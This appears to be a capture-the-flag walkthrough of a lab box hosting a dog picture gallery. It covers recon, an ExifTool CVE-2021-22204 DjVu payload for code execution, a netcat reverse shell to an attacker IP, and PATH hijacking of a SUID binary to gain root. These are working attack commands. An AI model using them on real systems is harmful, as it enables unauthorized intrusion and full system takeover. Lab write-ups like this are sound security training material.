# Recon
## NMAP
```txt
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 30:0f:38:8d:3b:be:67:f3:e0:ca:eb:1c:93:ad:15:86 (RSA)
|   256 46:09:66:2b:1f:d1:b9:3c:d7:e1:73:0f:2f:33:4f:74 (ECDSA)
|_  256 a8:43:0e:d2:c1:a9:d1:14:e0:95:31:a1:62:94:ed:44 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Dog Gallery!
|_http-favicon: Unknown favicon MD5: C1359D2DB192C32E31BDE9E7BDE0243B
```

# Enumeration
## Web
- Web server is Golang accordingly to NMAP.
- It's a gallery of Dog pictures.
- No robots.txt
- We find an interesting comment in the source.
```html
    <!--
        What should happen when we click on a picture of a dog? 
        How do we style it to make it show that it's clickable?
    -->
```
- If we click on a dog picture, we navigate to the dog picture.
`http://10.10.149.8/dogpic/?id=0`
- Possible SQL injection?
`http://10.10.149.8/dogpic/?id=5`
- Only ID 5 has some info about the dogs.
```txt
## Title:

Moon (left) and Diesel (right)

## Caption:

Purveyors of tennis balls

## Date:

No date.

## Author:

CMNatic
```

### FeroxBuster
```sh
301        0l        0w        0c http://10.10.149.8/upload                                                                                                                                   
200       30l       78w      803c http://10.10.149.8/                                                                                                                                         
200       33l       95w     1276c http://10.10.149.8/upload/ 
```
- We can upload pictures with title and caption
```html
        <form method="POST" action="[/dog/upload](view-source:http://10.10.149.8/dog/upload)" enctype="multipart/form-data">
            <div><label for="image">Image: </label><input type="file" name="image" accept="image/*" required></div>
            <div><label for="image">Title: </label><input type="text" name="title" required></div>
            <div><label for="image">Caption: </label><input type="text" name="caption" required></div>
            <button>Submit</button>
        </form>
```
- We can enumerate `/dog/` more.
- If we check our Burp site map, we find something interesting in the api call of `/dog/`
`/dog/getexifdata`
`/dog/getmetadata`
- This get's called when we click on a picture of a dog.
- If we view the JSON response of `/dog/getexifdata`, we see it's leaking the `exif` version.
`"ExifToolVersion": 12.23,`

# Foothold
- Searching around for a CVE for this version number ,we stumble upon [CVE-2021-22204](https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/) which is a RCE vulnerability.
- There's a Metasploit module for this but let's do it manually following the article.
```sh
$ bzz payload payload.bzz
# Compress our payload file with to make it non human-readable
 
$ djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
# INFO = Anything in the format 'N,N' where N is a number
# BGjp = Expects a JPEG image, but we can use /dev/null to use nothing as background image
# ANTz = Will write the compressed annotation chunk with the input file
```
- And our payload right now will just be `id` to test out our POC
	
`(metadata "\c${system('id')};")`
- And now if we view the `exifdata` of our picture in the gallery, we should see the ID of the user being reflected in the response.
```json
uid=1000(dogpics) gid=1000(dogpics) groups=1000(dogpics)
[{
  "SourceFile": "temp/2164138454.jpg",
```
- Now let's try for a reverse shell.
`(metadata "\c${system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.1.163 9001 >/tmp/f')};")`
- Now when we view the picture, we get a reverse shell.


# Post-Exploit
- We are user `dogpics`

## Internal Enumeration
```sh
Sudo version 1.8.29

Vulnerable to CVE-2021-40
```
- Maybe vulnerable if pkexec is vulnerable too.
```sh
/etc/systemd/system/dogpics.service is calling this writable executable: /home/dogpics/webserver
```
- We can change the content of `webserver`
```sh
-rwsr-sr-x. 1 root root 18K Sep 11  2021 /home/dogpics/serverManager (Unknown SUID binary)
```
- Unknown SUID maybe we can exploit.
- We also have a weird PATH set.
```sh
/home/dogpics/.local/bin:/home/dogpics/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin
```


## Privilege Escalation
- If we run the SUID `serverManager`, we see that we have two choices and if we select the first one we get this.
```sh
remote) dogpics@dejavu:/home/dogpics$ ./serverManager                                                                                                                                        
Welcome to the DogPics server manager Version 1.0                                                                                                                                             
Please enter a choice:                                                                                                                                                                        
0 -     Get server status                                                                                                                                                                     
1 -     Restart server                                                                                                                                                                        
0                                                                                                                                                                                             
● dogpics.service - Dog pictures                                                                                                                                                              
   Loaded: loaded (/etc/systemd/system/dogpics.service; enabled; vendor preset: disabled)                                                                                                     
   Active: active (running) since Mon 2022-07-04 17:19:03 BST; 28min ago                                                                                                                      
 Main PID: 777 (webserver)                                                                                                                                                                    
    Tasks: 15 (limit: 2745)                                                                                                                                                                   
   Memory: 138.4M                                                                                                                                                                             
   CGroup: /system.slice/dogpics.service                                                                                                                                                      
           ├─  777 /home/dogpics/webserver -p 80                                                                                                                                              
           ├─ 1106 /usr/bin/perl -w ./exiftool/exiftool -j temp/20093684.jpg
           ├─ 1107 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.1.163 9001 >/tmp/f
           ├─ 1110 cat /tmp/f
           ├─ 1111 sh -i
           ├─ 1112 nc 10.17.1.163 9001
           ├─ 1134 /usr/bin/script -qc /usr/bin/bash /dev/null
           ├─ 1136 /usr/bin/bash
           ├─ 7173 gpg-agent --homedir /home/dogpics/.gnupg --use-standard-socket --daemon
           ├─14158 ./serverManager
           └─14161 systemctl status --no-pager dogpics

Jul 04 17:19:03 dejavu systemd[1]: Started Dog pictures.
Jul 04 17:41:53 dejavu sudo[6944]: pam_unix(sudo:auth): authentication failure; logname=dogpics uid=1000 euid=0 tty=/dev/pts/0 ruser=dogpics rhost=  user=dogpics
Jul 04 17:41:54 dejavu sudo[6944]: pam_unix(sudo:auth): conversation failed
Jul 04 17:41:54 dejavu sudo[6944]: pam_unix(sudo:auth): auth could not identify password for [dogpics]
Jul 04 17:41:54 dejavu sudo[6944]:  dogpics : command not allowed ; TTY=pts/0 ; PWD=/dev/shm ; USER=root ; COMMAND=list

```
- It looks like the output of `systemctl status dogpics`, if we compare it, it is the same.
- Assuming it's not calling `systemctl` from the absolute path, we can abuse this and create a our malicious `systemctl`
- Oh and I just noticed we even have the source code for the binary.
```c
case 0:
        //printf("0\n");
        system("systemctl status --no-pager dogpics");
        break;
    case 1:
        system("systemctl restart dogpics");
        break;

```
- And we can confirm it's running `systemctl` using PATH variables.
- Let's create our own `systemctl` in `/tmp`
```sh
#!/bin/bash
chmod 4755 /bin/bash
```
- This basically sets the binary of `/bin/bash` to be a SUID.
- Now add this to our path.
```sh
export PATH=/tmp:$PATH
```
- Since `/tmp` is first, it'll find and use our `systemctl` first.
- Now we run `./serverManager` and check select 1, check the permission of `/bin/bash`
```sh
-rwsr-xr-x. 1 root root 1150584 May 27  2021 /bin/bash
```
- We are now root.